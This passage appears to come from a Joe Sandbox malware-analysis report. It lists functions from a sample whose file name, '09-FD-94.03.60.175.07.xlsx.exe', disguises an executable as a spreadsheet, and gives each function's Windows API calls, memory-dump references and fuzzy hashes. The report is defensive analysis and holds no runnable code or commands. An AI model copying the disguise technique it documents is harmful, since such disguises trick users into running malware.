                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e250f200d648af3f0bd61970bfe314c861a6b6aa0b25ddc882d3b39d553e7667
                                                          • Instruction ID: 924b227091e8338000478ad755e115b80dfeef44851b3a3b0f99ac33e872c674
                                                          • Opcode Fuzzy Hash: e250f200d648af3f0bd61970bfe314c861a6b6aa0b25ddc882d3b39d553e7667
                                                          • Instruction Fuzzy Hash: 07713571E04228DBEF28CF98C8447ADBBB1FF44305F15816AD856BB281C7785A96DF44
                                                          Function 00403062 Relevance: 4.6, APIs: 3, Instructions: 95fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetFilePointer.KERNELBASE(00409230,00000000,00000000,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000,00409230,?), ref: 00403088
                                                          • WriteFile.KERNELBASE(00000000,00413E90,?,000000FF,00000000,00413E90,00004000,00409230,00409230,?,00000004,00000000,00000000,?,?), ref: 00403115
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: File$PointerWrite
                                                          • String ID:
                                                          • API String ID: 539440098-0
                                                          • Opcode ID: 90118ecf7a9ba7c1b0c512c54543666c71b076bc3a218e086344a49311413f62
                                                          • Instruction ID: e0bff1d0cfda9ca41153e72f66d50dbc15cd376e58f7be5246e1248deba32b17
                                                          • Opcode Fuzzy Hash: 90118ecf7a9ba7c1b0c512c54543666c71b076bc3a218e086344a49311413f62
                                                          • Instruction Fuzzy Hash: A2315971504218EBDF20CF65ED45A9F3FB8EB08755F20807AF904EA1A0D3349E40DBA9
                                                          Function 00401F98 Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleW.KERNELBASE(00000000,00000001,?), ref: 00401FC3
                                                            • Part of subcall function 004051F2: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                            • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                            • Part of subcall function 004051F2: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll,00402D94,00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll,00000000,00000000,00000000), ref: 0040524D
                                                            • Part of subcall function 004051F2: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll), ref: 0040525F
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                          • LoadLibraryExW.KERNEL32(00000000,?,?,00000001,?), ref: 00401FD4
                                                          • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,?,00000001,?), ref: 00402051
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                          • String ID:
                                                          • API String ID: 334405425-0
                                                          • Opcode ID: a8461a16ac82fd46328c3b40fe1928024aef525999e2dd49edf51c7c032d1790
                                                          • Instruction ID: 409458e37c45ac75b59f5eb787cb01d488d5b476e6d1706a1798d0305ac83909
                                                          • Opcode Fuzzy Hash: a8461a16ac82fd46328c3b40fe1928024aef525999e2dd49edf51c7c032d1790
                                                          • Instruction Fuzzy Hash: A221C571904215F6CF206FA5CE48ADEBAB4AB04358F70427BF610B51E0D7B98E41DA6E
                                                          Function 100028A4 Relevance: 3.2, APIs: 2, Instructions: 156COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1608943585.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.1608921207.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000000.00000002.1608963992.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000000.00000002.1609013607.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10000000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: EnumErrorLastWindows
                                                          • String ID:
                                                          • API String ID: 14984897-0
                                                          • Opcode ID: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                                          • Instruction ID: 77f315af6c145f6c632c2ebe68d3f6cdb0cf0445c85f86b19d364da59c27affc
                                                          • Opcode Fuzzy Hash: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                                          • Instruction Fuzzy Hash: 8851C4B9905214DFFB20DFA4DD8675937A8EB443D0F22C42AEA04E721DCE34E990CB55
                                                          Function 004023E0 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00402C44: RegOpenKeyExW.KERNELBASE(00000000,000001D0,00000000,00000022,00000000,?,?), ref: 00402C6C
                                                          • RegQueryValueExW.ADVAPI32(00000000,00000000,?,00000800,?,?,?,?,00000033), ref: 00402411
                                                          • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: CloseOpenQueryValue
                                                          • String ID:
                                                          • API String ID: 3677997916-0
                                                          • Opcode ID: c32cffa1c652d0f2c9f8b1d7d2b39189a889ceb323ad23ef5d1c5f54ddf36b6e
                                                          • Instruction ID: d7ada52d2c39296e820c3ca3910a3186400bd00b77f85fef4b18c2a42e671548
                                                          • Opcode Fuzzy Hash: c32cffa1c652d0f2c9f8b1d7d2b39189a889ceb323ad23ef5d1c5f54ddf36b6e
                                                          • Instruction Fuzzy Hash: 53115171915205EEDB14CFA0C6889AFB6B4EF40359F20843FE042A72D0D6B85A41DB5A
                                                          Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                          • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID:
                                                          • API String ID: 3850602802-0
                                                          • Opcode ID: fdfb5bbf2347fc35bcb13febb1c36166d701c4f92b0c5c73d87b5da78d67bd23
                                                          • Instruction ID: 092ce593f34d4cefb17b57a654468e4a57f6b0d243feea45f1431905bdcf8400
                                                          • Opcode Fuzzy Hash: fdfb5bbf2347fc35bcb13febb1c36166d701c4f92b0c5c73d87b5da78d67bd23
                                                          • Instruction Fuzzy Hash: 6F01F431B24210ABE7295B389C05B6A3698E710314F10863FF911F62F1DA78DC13CB4D
                                                          Function 004022D5 Relevance: 3.0, APIs: 2, Instructions: 40registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00402C44: RegOpenKeyExW.KERNELBASE(00000000,000001D0,00000000,00000022,00000000,?,?), ref: 00402C6C
                                                          • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004022F4
                                                          • RegCloseKey.ADVAPI32(00000000), ref: 004022FD
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: CloseDeleteOpenValue
                                                          • String ID:
                                                          • API String ID: 849931509-0
                                                          • Opcode ID: 4bd72c51a3dc84892fe05f41f2106d015a2bbdeef4f8939a42ccf3008d047df4
                                                          • Instruction ID: 38b5be8bce117af921f4e5ecf87b48473febfbb911f594cd731ca38f4e60318c
                                                          • Opcode Fuzzy Hash: 4bd72c51a3dc84892fe05f41f2106d015a2bbdeef4f8939a42ccf3008d047df4
                                                          • Instruction Fuzzy Hash: 30F06272A04210ABEB15AFF59A4EBAE7278DB44318F20453BF201B71D1D5FC5D028A7D
                                                          Function 00405BB4 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe,80000000,00000003), ref: 00405BB8
                                                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405BDA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: File$AttributesCreate
                                                          • String ID:
                                                          • API String ID: 415043291-0
                                                          • Opcode ID: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
                                                          • Instruction ID: 50e17d5b3030c5d5ce0b1439250f6e41608f831a0cbc2ce1bc41554210f96241
                                                          • Opcode Fuzzy Hash: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
                                                          • Instruction Fuzzy Hash: 48D09E71658201EFFF098F20DE16F2EBBA2EB84B00F10562CB656940E0D6715815DB16
                                                          Function 004026F9 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 00402713
                                                            • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: FilePointerwsprintf
                                                          • String ID:
                                                          • API String ID: 327478801-0
                                                          • Opcode ID: cb0a79905901771ea4c1f75ea25e576bfed89f1d44749c98cb94dfee4278d200
                                                          • Instruction ID: 39f0610c8197233a3f531ee04e93b66353018be783afcd240567e016e4194b11
                                                          • Opcode Fuzzy Hash: cb0a79905901771ea4c1f75ea25e576bfed89f1d44749c98cb94dfee4278d200
                                                          • Instruction Fuzzy Hash: 29E01AB2B14114AADB01ABE5DD49CFEB66CEB40319F20043BF101F00D1C67959019A7E
                                                          Function 00402253 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 0040228A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: PrivateProfileStringWrite
                                                          • String ID:
                                                          • API String ID: 390214022-0
                                                          • Opcode ID: ec4fb41ec1acd106f93cf616f3cd4c0d3577891546256094c6c4aadbcc0c0451
                                                          • Instruction ID: 4332bbb19f5efe4f35bb732f6f353b7f8865d75a24debaa01da2fd7198b4a795
                                                          • Opcode Fuzzy Hash: ec4fb41ec1acd106f93cf616f3cd4c0d3577891546256094c6c4aadbcc0c0451
                                                          • Instruction Fuzzy Hash: 18E04F329041246ADB113EF20E8DE7F31689B44718B24427FF551BA1C2D5BC1D434669
                                                          Function 00405C37 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,00413E90,0040BE90,0040330C,00409230,00409230,004031FE,00413E90,00004000,?,00000000,?), ref: 00405C4B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID:
                                                          • API String ID: 2738559852-0
                                                          • Opcode ID: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
                                                          • Instruction ID: 63114739b8f5e766059d8f14c8810c8407dd6dd2a261f9f87ac8566b0288577e
                                                          • Opcode Fuzzy Hash: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
                                                          • Instruction Fuzzy Hash: F6E08632104259ABDF10AEA08C04EEB375CEB04350F044436F915E3140D230E9209BA4
                                                          Function 100027C7 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualProtect.KERNELBASE(1000405C,?,?,1000404C), ref: 100027E5
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1608943585.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.1608921207.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000000.00000002.1608963992.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000000.00000002.1609013607.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10000000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                          • Instruction ID: 0f6967942ea94a3d6c88e3f350f968197b77ea31d8e69eb9713f4ef8856af232
                                                          • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                          • Instruction Fuzzy Hash: 47F0A5F15057A0DEF350DF688C847063BE4E3483C4B03852AE3A8F6269EB344454CF19
                                                          Function 00402295 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 004022C6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: PrivateProfileString
                                                          • String ID:
                                                          • API String ID: 1096422788-0
                                                          • Opcode ID: 72cdf40c1bf6f5db5f4d9709fda42ed23ef015487cba6367b71ebc3a35df21ba
                                                          • Instruction ID: 80fa8228d7b44b53eec3e7c38ed93a9451a1703e345daa2b135a9f68ba926bbf
                                                          • Opcode Fuzzy Hash: 72cdf40c1bf6f5db5f4d9709fda42ed23ef015487cba6367b71ebc3a35df21ba
                                                          • Instruction Fuzzy Hash: 38E04F30800204BADB00AFA0CD49EAE3B78BF11344F20843AF581BB0D1E6B895809759
                                                          Function 0040159B Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetFileAttributesW.KERNELBASE(00000000,?,?), ref: 004015A6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: AttributesFile
                                                          • String ID:
                                                          • API String ID: 3188754299-0
                                                          • Opcode ID: 68a001bc1327843e2883382ea1a3ef1d27013be19fa5e5411c30e9fb0f16b135
                                                          • Instruction ID: 73733a4af0cc64661bb0b95da8c6c6dbb498264e8b287c2b288e90457a890fe4
                                                          • Opcode Fuzzy Hash: 68a001bc1327843e2883382ea1a3ef1d27013be19fa5e5411c30e9fb0f16b135
                                                          • Instruction Fuzzy Hash: B8D012B2B08100D7CB10DFE59A08ADDB765AB50329F304A77D111F21D0D2B885419A3A
